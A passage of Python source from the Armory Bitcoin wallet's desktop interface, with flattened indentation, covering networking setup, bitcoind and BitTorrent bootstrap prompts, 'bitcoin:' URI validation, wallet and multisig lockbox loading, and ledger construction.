            addedNotifyIDs.add(nid)
# Now remove them from the set that we are working with
for nid in irrelevantIDs:
del currNotificationList[nid]
      # Check for notifications we had before but no longer have
removedNotifyIDs = []
for nid,valmap in self.almostFullNotificationList.iteritems():
if not nid in currNotificationList:
removedNotifyIDs.append(nid)
#for nid in removedNotifyIDs:
#self.notifyIgnoreShort.discard(nid)
#self.notifyIgnoreLong.discard(nid)
# Change the "Announcements" tab color if something important is there
tabWidgetBar = self.mainDisplayTabs.tabBar()
tabColor = Colors.Foreground
if tabPriority >= 5120:
tabColor = Colors.TextRed
elif tabPriority >= 4096:
tabColor = Colors.TextRed
elif tabPriority >= 3072:
tabColor = Colors.TextBlue
elif tabPriority >= 2048:
tabColor = Colors.TextBlue
tabWidgetBar.setTabTextColor(self.MAINTABS.Announce, tabColor)
self.updateAnnounceTab()
      # We only do popups for notifications >=3072 (includes upgrade notifies)
if tabPriority >= 3072:
DlgNotificationWithDNAA(self, self, self.maxPriorityID, \
currNotificationList[self.maxPriorityID]).show()
elif vnotify:
if not vnotify['UNIQUEID'] in self.notifyIgnoreShort:
DlgNotificationWithDNAA(self,self,vnotify['UNIQUEID'],vnotify).show()
#############################################################################
def setupNetworking(self):
LOGINFO('Setting up networking...')
# Prevent Armory from being opened twice
from twisted.internet import reactor
import twisted
def uriClick_partial(a):
self.uriLinkClicked(a)
if CLI_OPTIONS.interport > 1:
try:
self.InstanceListener = ArmoryListenerFactory(self.bringArmoryToFront, \
uriClick_partial )
reactor.listenTCP(CLI_OPTIONS.interport, self.InstanceListener)
except twisted.internet.error.CannotListenError:
LOGWARN('Socket already occupied! This must be a duplicate Armory')
QMessageBox.warning(self, tr('Already Open'), tr("""
Armory is already running! You can only have one Armory open
at a time. Exiting..."""), QMessageBox.Ok)
os._exit(0)
else:
LOGWARN('*** Listening port is disabled. URI-handling will not work')
settingSkipCheck = self.getSettingOrSetDefault('SkipOnlineCheck', False)
useTor = self.getSettingOrSetDefault('UseTorSettings', False)
# Check general internet connection
self.internetStatus = isInternetAvailable(forceOnline =
CLI_OPTIONS.forceOnline or settingSkipCheck or useTor)
LOGINFO('Internet status: %s', self.internetStatus)
#############################################################################
def manageBitcoindAskTorrent(self):
if not satoshiIsAvailable():
reply = MsgBoxCustom(MSGBOX.Question, tr('BitTorrent Option'), tr("""
You are currently configured to run the core Bitcoin software
yourself (Bitcoin-Qt or bitcoind). <u>Normally</u>, you should
start the Bitcoin software first and wait for it to synchronize
with the network before starting Armory.
<br><br>
<b>However</b>, Armory can shortcut most of this initial
synchronization
for you using BitTorrent. If your firewall allows it,
using BitTorrent can be an order of magnitude faster (2x to 20x)
than letting the Bitcoin software download it via P2P.
<br><br>
<u>To synchronize using BitTorrent (recommended):</u>
Click "Use BitTorrent" below, and <u>do not</u> start the Bitcoin
software until after it is complete.
<br><br>
<u>To synchronize using Bitcoin P2P (fallback):</u>
Click "Cancel" below, then close Armory and start Bitcoin-Qt
(or bitcoind). Do not start Armory until you see a green checkmark
in the bottom-right corner of the Bitcoin-Qt window."""), \
wCancel=True, yesStr='Use BitTorrent')
if not reply:
QMessageBox.warning(self, tr('Synchronize'), tr("""
When you are ready to start synchronization, close Armory and
start Bitcoin-Qt or bitcoind. Restart Armory only when
synchronization is complete. If using Bitcoin-Qt, you will see
a green checkmark in the bottom-right corner"""), QMessageBox.Ok)
return False
else:
reply = MsgBoxCustom(MSGBOX.Question, tr('BitTorrent Option'), tr("""
You are currently running the core Bitcoin software, but it
            is not fully synchronized with the network yet. <u>Normally</u>,
            you should close Armory until Bitcoin-Qt (or bitcoind) is
            finished.
<br><br>
<b><u>However</u></b>, Armory can speed up this initial
synchronization for you using BitTorrent. If your firewall
allows it, using BitTorrent can be an order of magnitude
faster (2x to 20x)
than letting the Bitcoin software download it via P2P.
<br><br>
<u>To synchronize using BitTorrent (recommended):</u>
Close the running Bitcoin software <b>right now</b>. When it is
closed, click "Use BitTorrent" below. Restart the Bitcoin software
when Armory indicates it is complete.
<br><br>
<u>To synchronize using Bitcoin P2P (fallback):</u>
Click "Cancel" below, and then close Armory until the Bitcoin
software is finished synchronizing. If using Bitcoin-Qt, you
will see a green checkmark in the bottom-right corner of the
            main window."""), wCancel=True, yesStr='Use BitTorrent')
if reply:
if satoshiIsAvailable():
QMessageBox.warning(self, tr('Still Running'), tr("""
The Bitcoin software still appears to be open!
Close it <b>right now</b>
before clicking "Ok." The BitTorrent engine will start
as soon as you do."""), QMessageBox.Ok)
else:
QMessageBox.warning(self, tr('Synchronize'), tr("""
You chose to finish synchronizing with the network using
the Bitcoin software which is already running. Please close
Armory until it is finished. If you are running Bitcoin-Qt,
you will see a green checkmark in the bottom-right corner,
when it is time to open Armory again."""), QMessageBox.Ok)
return False
return True
############################################################################
def findTorrentFileForSDM(self, forceWaitTime=0):
"""
Hopefully the announcement fetcher has already gotten one for us,
or at least we have a default.
"""
# Only do an explicit announce check if we have no bootstrap at all
# (don't need to spend time doing an explicit check if we have one)
if self.announceFetcher.getFileModTime('bootstrap') == 0:
if forceWaitTime>0:
self.explicitCheckAnnouncements(forceWaitTime)
# If it's still not there, look for a default file
if self.announceFetcher.getFileModTime('bootstrap') == 0:
LOGERROR('Could not get announce bootstrap; using default')
srcTorrent = os.path.join(GetExecDir(), 'default_bootstrap.torrent')
else:
srcTorrent = self.announceFetcher.getAnnounceFilePath('bootstrap')
# Maybe we still don't have a torrent for some reason
if not srcTorrent or not os.path.exists(srcTorrent):
return ''
torrentPath = os.path.join(ARMORY_HOME_DIR, 'bootstrap.dat.torrent')
LOGINFO('Using torrent file: ' + torrentPath)
shutil.copy(srcTorrent, torrentPath)
return torrentPath
############################################################################
def startBitcoindIfNecessary(self):
LOGINFO('startBitcoindIfNecessary')
if self.internetStatus == INTERNET_STATUS.Unavailable or CLI_OPTIONS.offline:
LOGWARN('Not online, will not start bitcoind')
return False
if not self.doAutoBitcoind:
LOGWARN('Tried to start bitcoind, but ManageSatoshi==False')
return False
if satoshiIsAvailable():
LOGWARN('Tried to start bitcoind, but satoshi already running')
return False
self.setSatoshiPaths()
TheSDM.setDisabled(False)
torrentIsDisabled = self.getSettingOrSetDefault('DisableTorrent', False)
# Give the SDM the torrent file...it will use it if it makes sense
if not torrentIsDisabled and TheSDM.shouldTryBootstrapTorrent():
torrentFile = self.findTorrentFileForSDM(2)
if not torrentFile or not os.path.exists(torrentFile):
LOGERROR('Could not find torrent file')
else:
TheSDM.tryToSetupTorrentDL(torrentFile)
try:
# "satexe" is actually just the install directory, not the direct
         # path to the executable. That dir tree will be searched for bitcoind
TheSDM.setupSDM(extraExeSearch=self.satoshiExeSearchPath)
TheSDM.startBitcoind(self.notifyBitcoindIsReady)
LOGDEBUG('Bitcoind started without error')
return True
except:
LOGEXCEPT('Failed to setup SDM')
self.switchNetworkMode(NETWORKMODE.Offline)
############################################################################
def notifyBitcoindIsReady(self):
self.emit(SIGNAL('method_signal'), self.proceedOnceBitcoindIsReady)
############################################################################
def proceedOnceBitcoindIsReady(self):
self.loadBlockchainIfNecessary()
self.setDashboardDetails()
############################################################################
def setSatoshiPaths(self):
LOGINFO('setSatoshiPaths')
# We skip the getSettingOrSetDefault call, because we don't want to set
# it if it doesn't exist
if self.settings.hasSetting('SatoshiExe'):
if not os.path.exists(self.settings.get('SatoshiExe')):
LOGERROR('Bitcoin installation setting is a non-existent directory')
self.satoshiExeSearchPath = [self.settings.get('SatoshiExe')]
else:
self.satoshiExeSearchPath = []
self.satoshiHomePath = BTC_HOME_DIR
if self.settings.hasSetting('SatoshiDatadir') and \
CLI_OPTIONS.satoshiHome==DEFAULT:
# Setting override BTC_HOME_DIR only if it wasn't explicitly
# set as the command line.
self.satoshiHomePath = self.settings.get('SatoshiDatadir')
LOGINFO('Setting satoshi datadir = %s' % self.satoshiHomePath)
TheBDM.setSatoshiDir(self.satoshiHomePath)
TheSDM.setSatoshiDir(self.satoshiHomePath)
TheTDM.setSatoshiDir(self.satoshiHomePath)
############################################################################
   # This version of the online-mode check doesn't test the internet connection every time
def isOnlineModePossible(self):
return self.internetStatus != INTERNET_STATUS.Unavailable and \
satoshiIsAvailable() and \
os.path.exists(os.path.join(TheBDM.btcdir, 'blocks'))
############################################################################
def loadBlockchainIfNecessary(self):
LOGINFO('loadBlockchainIfNecessary')
if CLI_OPTIONS.offline:
self.switchNetworkMode(NETWORKMODE.Offline)
elif self.isOnlineModePossible():
# Track number of times we start loading the blockchain.
# We will decrement the number when loading finishes
# We can use this to detect problems with mempool or blkxxxx.dat
self.numTriesOpen = self.getSettingOrSetDefault('FailedLoadCount', 0)
if self.numTriesOpen>2:
self.loadFailedManyTimesFunc(self.numTriesOpen)
self.settings.set('FailedLoadCount', self.numTriesOpen+1)
self.switchNetworkMode(NETWORKMODE.Full)
TheBDM.goOnline()
else:
self.switchNetworkMode(NETWORKMODE.Offline)
#############################################################################
def switchNetworkMode(self, newMode):
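      """
      Swap the networking backend: a FakeClientFactory for Offline or
      Disconnected modes, or the singleton ArmoryClientFactory for Full mode.
      """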
LOGINFO('Setting netmode: %s', newMode)
self.netMode=newMode
if newMode in (NETWORKMODE.Offline, NETWORKMODE.Disconnected):
self.NetworkingFactory = FakeClientFactory()
elif newMode==NETWORKMODE.Full:
self.NetworkingFactory = self.getSingletonConnectedNetworkingFactory()
return
#############################################################################
def getSingletonConnectedNetworkingFactory(self):
if not self.SingletonConnectedNetworkingFactory:
# ArmoryClientFactory auto-reconnects, so add the connection
# the very first time and never afterwards.
# Actually setup the networking, now
from twisted.internet import reactor
def showOfflineMsg():
self.netMode = NETWORKMODE.Disconnected
self.setDashboardDetails()
self.lblArmoryStatus.setText( \
'<font color=%s><i>Disconnected</i></font>' % htmlColor('TextWarn'))
if not self.getSettingOrSetDefault('NotifyDiscon', True):
return
try:
self.showTrayMsg('Disconnected', 'Connection to Bitcoin-Qt ' \
'client lost! Armory cannot send nor ' \
'receive bitcoins until connection is ' \
're-established.', QSystemTrayIcon.Critical, \
10000)
except:
LOGEXCEPT('Failed to show disconnect notification')
self.connectCount = 0
def showOnlineMsg():
self.netMode = NETWORKMODE.Full
self.setDashboardDetails()
self.lblArmoryStatus.setText(\
'<font color=%s>Connected (%s blocks)</font> ' %
(htmlColor('TextGreen'), TheBDM.getTopBlockHeight()))
if not self.getSettingOrSetDefault('NotifyReconn', True):
return
try:
if self.connectCount>0:
self.showTrayMsg('Connected', 'Connection to Bitcoin-Qt ' \
're-established', \
QSystemTrayIcon.Information, 10000)
self.connectCount += 1
except:
LOGEXCEPT('Failed to show reconnect notification')
self.SingletonConnectedNetworkingFactory = ArmoryClientFactory(
TheBDM,
func_loseConnect=showOfflineMsg,
func_madeConnect=showOnlineMsg,
func_newTx=self.newTxFunc)
reactor.callWhenRunning(reactor.connectTCP, '127.0.0.1',
BITCOIN_PORT,
self.SingletonConnectedNetworkingFactory)
return self.SingletonConnectedNetworkingFactory
#############################################################################
def newTxFunc(self, pytxObj):
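      """
      Handle a newly observed transaction: push it into the BDM as a
      zero-confirmation tx, then hand the PyTx object to any registered
      extra-tx callbacks.
      """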
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED) or self.doShutdown:
return
TheBDM.bdv().addNewZeroConfTx(pytxObj.serialize(), long(RightNow()), True)
# All extra tx functions take one arg: the PyTx object of the new ZC tx
for txFunc in self.extraNewTxFunctions:
txFunc(pytxObj)
#############################################################################
def parseUriLink(self, uriStr, clickOrEnter='click'):
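      """
      Parse and validate a "bitcoin:" URI string. Returns a dict of URI
      fields on success, or an empty dict (after warning the user) if the
      URI is malformed, lacks an address, targets the wrong network, or
      contains unrecognized "req-" fields.

      Illustrative sketch (hypothetical values): a link such as
         bitcoin:<address>?amount=0.1&label=Donation
      would yield a dict with 'address', 'amount', and 'label' keys; the
      exact value types depend on parseBitcoinURI(), defined elsewhere.
      """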
if len(uriStr) < 1:
QMessageBox.critical(self, 'No URL String', \
'You have not entered a URL String yet. '
'Please go back and enter a URL String.', \
QMessageBox.Ok)
return {}
ClickOrEnter = clickOrEnter[0].upper() + clickOrEnter[1:]
      LOGINFO('URI link %sed!' % clickOrEnter)
LOGINFO('The following URI string was parsed:')
LOGINFO(uriStr.replace('%','%%'))
try:
uriDict = parseBitcoinURI(uriStr)
except:
# malformed uri, make the dict empty, which will trigger the warning
uriDict = {}
if TheBDM.getState() in (BDM_OFFLINE,BDM_UNINITIALIZED):
LOGERROR('%sed "bitcoin:" link in offline mode.' % ClickOrEnter)
self.bringArmoryToFront()
QMessageBox.warning(self, 'Offline Mode',
'You %sed on a "bitcoin:" link, but Armory is in '
'offline mode, and is not capable of creating transactions. '
'%sing links will only work if Armory is connected '
'to the Bitcoin network!' % (clickOrEnter, ClickOrEnter), \
QMessageBox.Ok)
return {}
if len(uriDict)==0:
warnMsg = ('It looks like you just %sed a "bitcoin:" link, but '
'that link is malformed. ' % clickOrEnter)
if self.usermode == USERMODE.Standard:
warnMsg += ('Please check the source of the link and enter the '
'transaction manually.')
else:
warnMsg += 'The raw URI string is:\n\n' + uriStr
QMessageBox.warning(self, 'Invalid URI', warnMsg, QMessageBox.Ok)
LOGERROR(warnMsg.replace('\n', ' '))
return {}
if not uriDict.has_key('address'):
         QMessageBox.warning(self, 'No Address in URI', \
            'The "bitcoin:" link you just %sed '
            'does not even contain an address! There is nothing that '
            'Armory can do with this link!' % clickOrEnter, QMessageBox.Ok)
LOGERROR('No address in "bitcoin:" link! Nothing to do!')
return {}
      # Verify the URI is for the same network as this Armory instance
theAddrByte = checkAddrType(base58_to_binary(uriDict['address']))
if theAddrByte!=-1 and not theAddrByte in [ADDRBYTE, P2SHBYTE]:
net = 'Unknown Network'
if NETWORKS.has_key(theAddrByte):
net = NETWORKS[theAddrByte]
QMessageBox.warning(self, 'Wrong Network!', \
'The address for the "bitcoin:" link you just %sed is '
'for the wrong network! You are on the <b>%s</b> '
            'and the address you supplied is for the '
'<b>%s</b>!' % (clickOrEnter, NETWORKS[ADDRBYTE], net), \
QMessageBox.Ok)
LOGERROR('URI link is for the wrong network!')
return {}
# If the URI contains "req-" strings we don't recognize, throw error
recognized = ['address','version','amount','label','message']
for key,value in uriDict.iteritems():
if key.startswith('req-') and not key[4:] in recognized:
QMessageBox.warning(self,'Unsupported URI', 'The "bitcoin:" link '
'you just %sed contains fields that are required but not '
'recognized by Armory. This may be an older version of Armory, '
'or the link you %sed on uses an exotic, unsupported format.'
'<br><br>The action cannot be completed.' % (clickOrEnter, clickOrEnter), \
QMessageBox.Ok)
LOGERROR('URI link contains unrecognized req- fields.')
return {}
return uriDict
#############################################################################
def uriLinkClicked(self, uriStr):
LOGINFO('uriLinkClicked')
if TheBDM.getState()==BDM_OFFLINE:
QMessageBox.warning(self, 'Offline', \
'You just clicked on a "bitcoin:" link, but Armory is offline '
'and cannot send transactions. Please click the link '
'again when Armory is online.', \
QMessageBox.Ok)
return
elif not TheBDM.getState()==BDM_BLOCKCHAIN_READY:
         # BDM isn't ready yet; save URI strings in the delayed URI dict to
         # process later through finishLoadBlockchainGUI
qLen = self.delayedURIData['qLen']
self.delayedURIData[qLen] = uriStr
qLen = qLen +1
self.delayedURIData['qLen'] = qLen
return
uriDict = self.parseUriLink(uriStr, 'click')
if len(uriDict)>0:
self.bringArmoryToFront()
return self.uriSendBitcoins(uriDict)
#############################################################################
def loadWalletsAndSettings(self, updateProgress):
LOGINFO('loadWalletsAndSettings')
self.getSettingOrSetDefault('First_Load', True)
self.getSettingOrSetDefault('Load_Count', 0)
self.getSettingOrSetDefault('User_Mode', 'Advanced')
self.getSettingOrSetDefault('UnlockTimeout', 10)
self.getSettingOrSetDefault('DNAA_UnlockTimeout', False)
# Determine if we need to do new-user operations, increment load-count
self.firstLoad = False
if self.getSettingOrSetDefault('First_Load', True):
self.firstLoad = True
self.writeSetting('First_Load', False)
self.writeSetting('First_Load_Date', long(RightNow()))
self.writeSetting('Load_Count', 1)
self.writeSetting('AdvFeature_UseCt', 0)
else:
self.writeSetting('Load_Count', (self.settings.get('Load_Count')+1) % 100)
# Set the usermode, default to standard
self.usermode = USERMODE.Standard
if self.settings.get('User_Mode') == 'Advanced':
self.usermode = USERMODE.Advanced
elif self.settings.get('User_Mode') == 'Expert':
self.usermode = USERMODE.Expert
# The user may have asked to never be notified of a particular
# notification again. We have a short-term list (wiped on every
# load), and a long-term list (saved in settings). We simply
# initialize the short-term list with the long-term list, and add
# short-term ignore requests to it
notifyStr = self.getSettingOrSetDefault('NotifyIgnore', '')
nsz = len(notifyStr)
self.notifyIgnoreLong = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
self.notifyIgnoreShort = set(notifyStr[8*i:8*(i+1)] for i in range(nsz/8))
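      # E.g. a stored string of two 8-char IDs, 'deadbeef01234567', splits
      # into the set {'deadbeef', '01234567'} (IDs are 4 bytes, hex-encoded)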
# Load wallets found in the .armory directory
self.walletMap = {}
self.walletIndices = {}
self.walletIDSet = set()
# I need some linear lists for accessing by index
self.walletIDList = []
self.walletVisibleList = []
self.wltIDList = []
self.combinedLedger = []
self.ledgerSize = 0
self.ledgerTable = []
self.walletSideScanProgress = {}
LOGINFO('Loading wallets...')
wltPaths = readWalletFiles()
wltExclude = self.settings.get('Excluded_Wallets', expectList=True)
ratioPerWallet = 0
if len(wltPaths) > 0:
ratioPerWallet = 100 / float(len(wltPaths))
i = 0
for fpath in wltPaths:
currentProgress = float(i) * ratioPerWallet
updateProgress(currentProgress)
i += 1
def reportProgress(val):
updateProgress(currentProgress + val*ratioPerWallet
)
try:
wltLoad = PyBtcWallet().readWalletFile(fpath, \
reportProgress=reportProgress)
wltID = wltLoad.uniqueIDB58
if fpath in wltExclude or wltID in wltExclude:
continue
if wltID in self.walletIDSet:
LOGWARN('***WARNING: Duplicate wallet detected, %s', wltID)
wo1 = self.walletMap[wltID].watchingOnly
wo2 = wltLoad.watchingOnly
if wo1 and not wo2:
prevWltPath = self.walletMap[wltID].walletPath
self.walletMap[wltID] = wltLoad
LOGWARN('First wallet is more useful than the second one...')
LOGWARN(' Wallet 1 (loaded): %s', fpath)
LOGWARN(' Wallet 2 (skipped): %s', prevWltPath)
else:
LOGWARN('Second wallet is more useful than the first one...')
LOGWARN(' Wallet 1 (skipped): %s', fpath)
LOGWARN(' Wallet 2 (loaded): %s', self.walletMap[wltID].walletPath)
else:
# Update the maps/dictionaries
self.walletMap[wltID] = wltLoad
self.walletIndices[wltID] = len(self.walletMap)-1
# Maintain some linear lists of wallet info
self.walletIDSet.add(wltID)
self.walletIDList.append(wltID)
wtype = determineWalletType(wltLoad, self)[0]
notWatch = (not wtype == WLTTYPES.WatchOnly)
defaultVisible = self.getWltSetting(wltID, 'LedgerShow', notWatch)
self.walletVisibleList.append(defaultVisible)
wltLoad.mainWnd = self
except:
LOGEXCEPT( '***WARNING: Wallet could not be loaded: %s (skipping)',
fpath)
#raise
LOGINFO('Number of wallets read in: %d', len(self.walletMap))
for wltID, wlt in self.walletMap.iteritems():
dispStr = (' Wallet (%s):' % wlt.uniqueIDB58).ljust(25)
dispStr += '"'+wlt.labelName.ljust(32)+'" '
dispStr += '(Encrypted)' if wlt.useEncryption else '(No Encryption)'
LOGINFO(dispStr)
# Register all wallets with TheBDM
wlt.registerWallet()
# Create one wallet per lockbox to make sure we can query individual
# lockbox histories easily.
if self.usermode==USERMODE.Expert:
LOGINFO('Loading Multisig Lockboxes')
self.loadLockboxesFromFile(MULTISIG_FILE)
# Get the last directory
savedDir = self.settings.get('LastDirectory')
if len(savedDir)==0 or not os.path.exists(savedDir):
savedDir = ARMORY_HOME_DIR
self.lastDirectory = savedDir
self.writeSetting('LastDirectory', savedDir)
updateProgress(100)
#############################################################################
@RemoveRepeatingExtensions
def getFileSave(self, title='Save Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultFilename=None):
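      """
      Show a save-file dialog (non-native on OS X, where native dialogs can
      freeze), remember the chosen directory as 'LastDirectory', and return
      the selected path as a unicode string (empty if cancelled).
      """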
LOGDEBUG('getFileSave')
startPath = self.settings.get('LastDirectory')
if len(startPath)==0 or not os.path.exists(startPath):
startPath = ARMORY_HOME_DIR
if not defaultFilename==None:
startPath = os.path.join(startPath, defaultFilename)
types = ffilter
types.append('All files (*)')
typesStr = ';; '.join(types)
# Open the native file save dialog and grab the saved file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr))
else:
fullPath = unicode(QFileDialog.getSaveFileName(self, title, startPath,
typesStr,
options=QFileDialog.DontUseNativeDialog))
fdir,fname = os.path.split(fullPath)
if fdir:
self.writeSetting('LastDirectory', fdir)
return fullPath
#############################################################################
def getFileLoad(self, title='Load Wallet File', \
ffilter=['Wallet files (*.wallet)'], \
defaultDir=None):
LOGDEBUG('getFileLoad')
if defaultDir is None:
defaultDir = self.settings.get('LastDirectory')
if len(defaultDir)==0 or not os.path.exists(defaultDir):
defaultDir = ARMORY_HOME_DIR
types = list(ffilter)
types.append(tr('All files (*)'))
typesStr = ';; '.join(types)
# Open the native file load dialog and grab the loaded file/path unless
# we're in OS X, where native dialogs sometimes freeze. Looks like a Qt
# issue of some sort. Some experimental code under ArmoryMac that directly
# calls a dialog produces better results but still freezes under some
# circumstances.
if not OS_MACOSX:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typesStr))
else:
fullPath = unicode(QFileDialog.getOpenFileName(self, title, defaultDir,
typesStr,
options=QFileDialog.DontUseNativeDialog))
self.writeSetting('LastDirectory', os.path.split(fullPath)[0])
return fullPath
##############################################################################
def getWltSetting(self, wltID, propName, defaultValue=''):
      # Sometimes we need settings specific to individual wallets -- we will
# prefix the settings name with the wltID.
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
if self.settings.hasSetting(wltPropName):
return self.settings.get(wltPropName)
else:
if not defaultValue=='':
self.setWltSetting(wltID, propName, defaultValue)
return defaultValue
#############################################################################
def setWltSetting(self, wltID, propName, value):
wltPropName = 'Wallet_%s_%s' % (wltID, propName)
self.writeSetting(wltPropName, value)
#############################################################################
def toggleIsMine(self, wltID):
      alreadyMine = self.getWltSetting(wltID, 'IsMine')
      self.setWltSetting(wltID, 'IsMine', not alreadyMine)
#############################################################################
def loadLockboxesFromFile(self, fn):
self.allLockboxes = []
self.cppLockboxWltMap = {}
if not os.path.exists(fn):
return
lbList = readLockboxesFile(fn)
for lb in lbList:
self.updateOrAddLockbox(lb)
#############################################################################
def updateOrAddLockbox(self, lbObj, isFresh=False):
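      """
      Add a new lockbox (registering both its bare-multisig and P2SH
      scrAddrs) or replace an existing one with the same ID, then persist
      the full lockbox list to MULTISIG_FILE.
      """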
try:
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
# Add new lockbox to list
self.allLockboxes.append(lbObj)
self.lockboxIDMap[lbID] = len(self.allLockboxes)-1
scraddrReg = script_to_scrAddr(lbObj.binScript)
scraddrP2SH = script_to_scrAddr(script_to_p2sh_script(lbObj.binScript))
            scrAddrList = [scraddrReg, scraddrP2SH]
self.cppLockboxWltMap[lbID] = lbObj.registerLockbox(scrAddrList, isFresh)
else:
# Replace the original
self.allLockboxes[index] = lbObj
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
except:
LOGEXCEPT('Failed to add/update lockbox')
#############################################################################
def removeLockbox(self, lbObj):
lbID = lbObj.uniqueIDB58
index = self.lockboxIDMap.get(lbID)
if index is None:
LOGERROR('Tried to remove lockbox that DNE: %s', lbID)
else:
del self.allLockboxes[index]
self.reconstructLockboxMaps()
writeLockboxesFile(self.allLockboxes, MULTISIG_FILE)
#############################################################################
def reconstructLockboxMaps(self):
self.lockboxIDMap.clear()
for i,box in enumerate(self.allLockboxes):
self.lockboxIDMap[box.uniqueIDB58] = i
#############################################################################
def getLockboxByID(self, boxID):
index = self.lockboxIDMap.get(boxID)
return None if index is None else self.allLockboxes[index]
################################################################################
   # Return the lockbox whose P2SH address string matches p2shAddrStr,
   # otherwise return None
def getLockboxByP2SHAddrStr(self, p2shAddrStr):
for lboxId in self.lockboxIDMap.keys():
lbox = self.allLockboxes[self.lockboxIDMap[lboxId]]
if p2shAddrStr == binScript_to_p2shAddrStr(lbox.binScript):
return lbox
return None
#############################################################################
def browseLockboxes(self):
self.lbDialog = DlgLockboxManager(self, self)
self.lbDialog.exec_()
      self.lbDialog = None
#############################################################################
def getContribStr(self, binScript, contribID='', contribLabel=''):
"""
This is used to display info for the lockbox interface. It might also be
useful as a general script_to_user_string method, where you have a
binScript and you want to tell the user something about it. However,
it is verbose, so it won't fit in a send-confirm dialog, necessarily.
We should extract as much information as possible without contrib*. This
at least guarantees that we see the correct data for our own wallets
and lockboxes, even if the data for other parties is incorrect.
"""
displayInfo = self.getDisplayStringForScript(binScript, 60, 2)
if displayInfo['WltID'] is not None:
return displayInfo['String'], ('WLT:%s' % displayInfo['WltID'])
elif displayInfo['LboxID'] is not None:
return displayInfo['String'], ('LB:%s' % displayInfo['LboxID'])
scriptType = getTxOutScriptType(binScript)
# At this point, we can use the contrib ID (and know we can't sign it)
if contribID or contribLabel:
if contribID:
if contribLabel:
outStr = 'Contributor "%s" (%s)' % (contribLabel, contribID)
else:
outStr = 'Contributor %s' % contribID
else:
if contribLabel:
outStr = 'Contributor "%s"' % contribLabel
else:
outStr = 'Unknown Contributor'
LOGERROR('How did we get to this impossible else-statement?')
return outStr, ('CID:%s' % contribID)
# If no contrib ID, then salvage anything
astr = displayInfo['AddrStr']
cid = None
if scriptType == CPP_TXOUT_MULTISIG:
M,N,a160s,pubs = getMultisigScriptInfo(binScript)
dispStr = 'Unrecognized Multisig %d-of-%d: P2SH=%s' % (M,N,astr)
cid = 'MS:%s' % astr
elif scriptType == CPP_TXOUT_P2SH:
dispStr = 'Unrecognized P2SH: %s' % astr
cid = 'P2SH:%s' % astr
elif scriptType in CPP_TXOUT_HAS_ADDRSTR:
dispStr = 'Address: %s' % astr
cid = 'ADDR:%s' % astr
else:
dispStr = 'Non-standard: P2SH=%s' % astr
cid = 'NS:%s' % astr
return dispStr, cid
#############################################################################
def getWalletForAddr160(self, addr160):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasAddr(addr160):
return wltID
return ''
#############################################################################
def getWalletForScrAddr(self, scrAddr):
for wltID, wlt in self.walletMap.iteritems():
if wlt.hasScrAddr(scrAddr):
return wltID
return ''
#############################################################################
def getSettingOrSetDefault(self, settingName, defaultVal):
s = self.settings.getSettingOrSetDefault(settingName, defaultVal)
return s
#############################################################################
def writeSetting(self, settingName, val):
self.settings.set(settingName, val)
# NB: armoryd has a similar function (Armory_Daemon::start()), and both share
# common functionality in ArmoryUtils (finishLoadBlockchainCommon). If you
# mod this function, please be mindful of what goes where, and make sure
# any critical functionality makes it into armoryd.
def finishLoadBlockchainGUI(self):
# Let's populate the wallet info after finishing loading the blockchain.
self.setDashboardDetails()
self.memPoolInit = True
self.createCombinedLedger()
self.ledgerSize = len(self.combinedLedger)
self.statusBar().showMessage('Blockchain loaded, wallets sync\'d!', 10000)
if self.netMode==NETWORKMODE.Full:
LOGINFO('Current block number: %d', TheBDM.getTopBlockHeight())
self.lblArmoryStatus.setText(\
'<font color=%s>Connected (%s blocks)</font> ' %
(htmlColor('TextGreen'), TheBDM.getTopBlockHeight()))
currSyncSuccess = self.getSettingOrSetDefault("SyncSuccessCount", 0)
self.writeSetting('SyncSuccessCount', min(currSyncSuccess+1, 10))
if self.getSettingOrSetDefault('NotifyBlkFinish',True):
reply,remember = MsgBoxWithDNAA(self, self, MSGBOX.Info, \
'Blockchain Loaded!', 'Blockchain loading is complete. '
'Your balances and transaction history are now available '
'under the "Transactions" tab. You can also send and '
'receive bitcoins.', \
dnaaMsg='Do not show me this notification again ', yesStr='OK')
if remember==True:
self.writeSetting('NotifyBlkFinish',False)
self.mainDisplayTabs.setCurrentIndex(self.MAINTABS.Ledger)
self.netMode = NETWORKMODE.Full
self.settings.set('FailedLoadCount', 0)
# This will force the table to refresh with new data
self.updateAnnounceTab() # make sure satoshi version info is up to date
self.removeBootstrapDat() # if we got here, we're *really* done with it
self.walletModel.reset()
qLen = self.delayedURIData['qLen']
if qLen > 0:
         # Delayed URI strings queued earlier; feed them back to the URI parser now
for i in range(0, qLen):
uriStr = self.delayedURIData[qLen-i-1]
self.delayedURIData['qLen'] = qLen -i -1
self.uriLinkClicked(uriStr)
#############################################################################
def removeBootstrapDat(self):
bfile = os.path.join(BTC_HOME_DIR, 'bootstrap.dat.old')
if os.path.exists(bfile):
os.remove(bfile)
#############################################################################
def changeLedgerSorting(self, col, order):
"""
The direct sorting was implemented to avoid having to search for comment
information for every ledger entry. Therefore, you can't sort by comments
without getting them first, which is the original problem to avoid.
"""
if col in (LEDGERCOLS.NumConf, LEDGERCOLS.DateStr, \
LEDGERCOLS.Comment, LEDGERCOLS.Amount, LEDGERCOLS.WltName):
self.sortLedgCol = col
self.sortLedgOrder = order
self.createCombinedLedger()
#############################################################################
def createCombinedLedger(self, resetMainLedger=False):
"""
Create a ledger to display on the main screen, that consists of ledger
entries of any SUBSET of available wallets.
"""
bdmState = TheBDM.getState()
self.combinedLedger = []
#self.combinedLedger.extend(TheBDM.bdv().getWalletsHistoryPage(self.mainLedgerCurrentPage -1))
totalFunds = 0
spendFunds = 0
unconfFunds = 0
if bdmState == BDM_BLOCKCHAIN_READY:
for wltID in self.wltIDList:
wlt = self.walletMap[wltID]
totalFunds += wlt.getBalance('Total')
spendFunds += wlt.getBalance('Spendable')
unconfFunds += wlt.getBalance('Unconfirmed')
